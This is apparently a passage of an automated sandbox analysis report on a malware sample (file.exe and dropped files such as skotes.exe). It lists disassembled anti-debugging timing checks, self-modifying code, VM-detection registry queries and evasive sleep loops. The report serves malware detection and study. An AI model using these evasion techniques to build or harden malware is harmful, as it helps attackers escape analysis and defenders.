Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C80B9A second address: 4C80BFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jmp 00007F4FB8FDD4FAh 0x0000000e mov dword ptr [esp], ebx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F4FB8FDD4FEh 0x00000018 add si, B778h 0x0000001d jmp 00007F4FB8FDD4FBh 0x00000022 popfd 0x00000023 push ecx 0x00000024 pop esi 0x00000025 popad 0x00000026 push ebp 0x00000027 jmp 00007F4FB8FDD4FEh 0x0000002c mov dword ptr [esp], ebx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F4FB8FDD507h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C80BFF second address: 4C80C61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov si, dx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+14h] 0x0000000e jmp 00007F4FB8D62287h 0x00000013 push dword ptr [ebp+10h] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jmp 00007F4FB8D6227Bh 0x0000001e pushfd 0x0000001f jmp 00007F4FB8D62288h 0x00000024 and ecx, 054840F8h 0x0000002a jmp 00007F4FB8D6227Bh 0x0000002f popfd 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C80CA0 second address: 4C80CA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C80CA4 second address: 4C80CAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C80CAA second address: 4C80D00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4FB8FDD4FCh 0x00000009 sbb ch, FFFFFFE8h 0x0000000c jmp 00007F4FB8FDD4FBh 0x00000011 popfd 0x00000012 mov edx, ecx 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pop ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov edx, 25C8BBE2h 0x00000020 pushfd 0x00000021 jmp 00007F4FB8FDD503h 0x00000026 jmp 00007F4FB8FDD503h 0x0000002b popfd 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C80D00 second address: 4C80D3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8D62289h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esp, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F4FB8D62288h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C80D3B second address: 4C80D41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C90BD3 second address: 4C90BD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C90BD7 second address: 4C90BE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8FDD4FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D0041C second address: 4D0043A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4FB8D62282h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D0043A second address: 4D004A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4FB8FDD501h 0x00000009 add ecx, 27468C16h 0x0000000f jmp 00007F4FB8FDD501h 0x00000014 popfd 0x00000015 movzx esi, bx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c jmp 00007F4FB8FDD503h 0x00000021 mov ebp, esp 0x00000023 pushad 0x00000024 jmp 00007F4FB8FDD504h 0x00000029 popad 0x0000002a pop ebp 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D004A0 second address: 4D004A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D004A4 second address: 4D004A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D004A8 second address: 4D004AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00311 second address: 4D00317 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00317 second address: 4D0031C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0252 second address: 4CA0276 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8FDD509h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0276 second address: 4CA02C4 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F4FB8D62286h 0x00000008 add esi, 5BEF81D8h 0x0000000e jmp 00007F4FB8D6227Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 call 00007F4FB8D62288h 0x0000001b pop edi 0x0000001c popad 0x0000001d pop ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA02C4 second address: 4CA02DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8FDD505h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00727 second address: 4D00793 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8D6227Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F4FB8D6227Bh 0x00000010 xchg eax, ebp 0x00000011 jmp 00007F4FB8D62286h 0x00000016 mov ebp, esp 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F4FB8D6227Eh 0x0000001f xor eax, 48BB0488h 0x00000025 jmp 00007F4FB8D6227Bh 0x0000002a popfd 0x0000002b mov bh, cl 0x0000002d popad 0x0000002e push dword ptr [ebp+0Ch] 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F4FB8D6227Eh 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00793 second address: 4D00799 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00799 second address: 4D0079D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D0079D second address: 4D007A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D0082A second address: 4D00830 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDF069 second address: EDF073 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4FB8FDD4F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDF073 second address: EDF07D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F4FB8D62276h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDF2DB second address: EDF2DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDF52E second address: EDF534 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDF534 second address: EDF538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDF538 second address: EDF55C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4FB8D62289h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE21CE second address: EE21D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0544 second address: 4CB056E instructions: 0x00000000 rdtsc 0x00000002 call 00007F4FB8D62288h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebx, 33C58136h 0x0000000f popad 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB056E second address: 4CB0572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0572 second address: 4CB0581 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8D6227Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0581 second address: 4CB0587 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0587 second address: 4CB058B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB058B second address: 4CB05CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b pushad 0x0000000c call 00007F4FB8FDD4FDh 0x00000011 pop ecx 0x00000012 pushad 0x00000013 mov dh, 7Fh 0x00000015 push eax 0x00000016 pop edi 0x00000017 popad 0x00000018 popad 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F4FB8FDD508h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB05CA second address: 4CB05D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8D6227Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB05D9 second address: 4CB05DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB05DF second address: 4CB05E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB05E3 second address: 4CB05E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB05E7 second address: 4CB064D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push FFFFFFFEh 0x0000000a jmp 00007F4FB8D62287h 0x0000000f call 00007F4FB8D62279h 0x00000014 jmp 00007F4FB8D62286h 0x00000019 push eax 0x0000001a jmp 00007F4FB8D6227Bh 0x0000001f mov eax, dword ptr [esp+04h] 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F4FB8D62284h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB064D second address: 4CB0653 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0653 second address: 4CB0657 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0657 second address: 4CB06CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a pushad 0x0000000b mov dx, ax 0x0000000e pushad 0x0000000f mov dx, ax 0x00000012 movzx esi, dx 0x00000015 popad 0x00000016 popad 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b pushad 0x0000001c push esi 0x0000001d pop eax 0x0000001e call 00007F4FB8FDD507h 0x00000023 jmp 00007F4FB8FDD508h 0x00000028 pop ecx 0x00000029 popad 0x0000002a pop eax 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e pushfd 0x0000002f jmp 00007F4FB8FDD4FAh 0x00000034 xor esi, 48E9FB58h 0x0000003a jmp 00007F4FB8FDD4FBh 0x0000003f popfd 0x00000040 mov dx, cx 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB06CB second address: 4CB06DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FB8D62280h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB06DF second address: 4CB070A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8FDD4FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push 69C1EE37h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F4FB8FDD501h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB070A second address: 4CB070E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB070E second address: 4CB0714 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0714 second address: 4CB0733 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, ch 0x00000005 mov eax, edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 0D2EBFC9h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F4FB8D6227Ch 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0733 second address: 4CB0779 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8FDD4FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr fs:[00000000h] 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F4FB8FDD4FBh 0x00000018 adc cx, 2A3Eh 0x0000001d jmp 00007F4FB8FDD509h 0x00000022 popfd 0x00000023 mov bh, al 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0779 second address: 4CB077F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB077F second address: 4CB07A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4FB8FDD507h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB07A1 second address: 4CB07E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8D62289h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F4FB8D62281h 0x0000000f nop 0x00000010 pushad 0x00000011 mov bx, ax 0x00000014 mov bx, si 0x00000017 popad 0x00000018 sub esp, 1Ch 0x0000001b pushad 0x0000001c push esi 0x0000001d push ebx 0x0000001e pop ecx 0x0000001f pop edx 0x00000020 push eax 0x00000021 push edx 0x00000022 mov bx, si 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB07E6 second address: 4CB07F6 instructions: 0x00000000 rdtsc 0x00000002 mov cx, 9BB1h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB07F6 second address: 4CB080F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8D62285h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB080F second address: 4CB0839 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4FB8FDD507h 0x00000008 movzx eax, di 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 mov bx, si 0x00000013 push eax 0x00000014 push edx 0x00000015 movzx eax, dx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0839 second address: 4CB0871 instructions: 0x00000000 rdtsc 0x00000002 mov esi, ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b mov bx, ax 0x0000000e pushfd 0x0000000f jmp 00007F4FB8D62286h 0x00000014 sub ecx, 4641F4A8h 0x0000001a jmp 00007F4FB8D6227Bh 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0871 second address: 4CB08AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4FB8FDD4FFh 0x00000009 and al, FFFFFFEEh 0x0000000c jmp 00007F4FB8FDD509h 0x00000011 popfd 0x00000012 mov dx, ax 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, esi 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB08AE second address: 4CB08B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB08B4 second address: 4CB08C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FB8FDD4FDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB08C5 second address: 4CB08C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB08C9 second address: 4CB08F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov si, 0929h 0x0000000e mov ax, 0EE5h 0x00000012 popad 0x00000013 xchg eax, esi 0x00000014 jmp 00007F4FB8FDD500h 0x00000019 xchg eax, edi 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov si, di 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB08F6 second address: 4CB08FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB08FB second address: 4CB091A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8FDD504h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB091A second address: 4CB0936 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8D62288h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0936 second address: 4CB0963 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8FDD4FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b mov edx, ecx 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 mov eax, dword ptr [76FBB370h] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F4FB8FDD4FEh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0963 second address: 4CB0967 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0967 second address: 4CB096D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB096D second address: 4CB09FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8D6227Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [ebp-08h], eax 0x0000000c jmp 00007F4FB8D62280h 0x00000011 xor eax, ebp 0x00000013 jmp 00007F4FB8D62281h 0x00000018 nop 0x00000019 pushad 0x0000001a movzx eax, bx 0x0000001d pushfd 0x0000001e jmp 00007F4FB8D62289h 0x00000023 and cx, 9A76h 0x00000028 jmp 00007F4FB8D62281h 0x0000002d popfd 0x0000002e popad 0x0000002f push eax 0x00000030 jmp 00007F4FB8D62281h 0x00000035 nop 0x00000036 pushad 0x00000037 mov edi, esi 0x00000039 popad 0x0000003a lea eax, dword ptr [ebp-10h] 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 push edx 0x00000041 pop esi 0x00000042 mov ah, dh 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB09FE second address: 4CB0A2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8FDD505h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr fs:[00000000h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F4FB8FDD4FDh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0A2C second address: 4CB0A3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FB8D6227Ch 0x00000009 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: D2E855 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: ED2582 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: F60997 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 9CE855 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: B72582 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: C00997 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Special instruction interceptor: First address: 1544C2C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Special instruction interceptor: First address: 16F9EFD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Special instruction interceptor: First address: 172860B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Special instruction interceptor: First address: 178CB7D instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04D007D8 rdtsc 0_2_04D007D8
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1423 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 385 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1400 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1404 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\service123.exe Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7848 Thread sleep count: 32 > 30 Jump to behavior
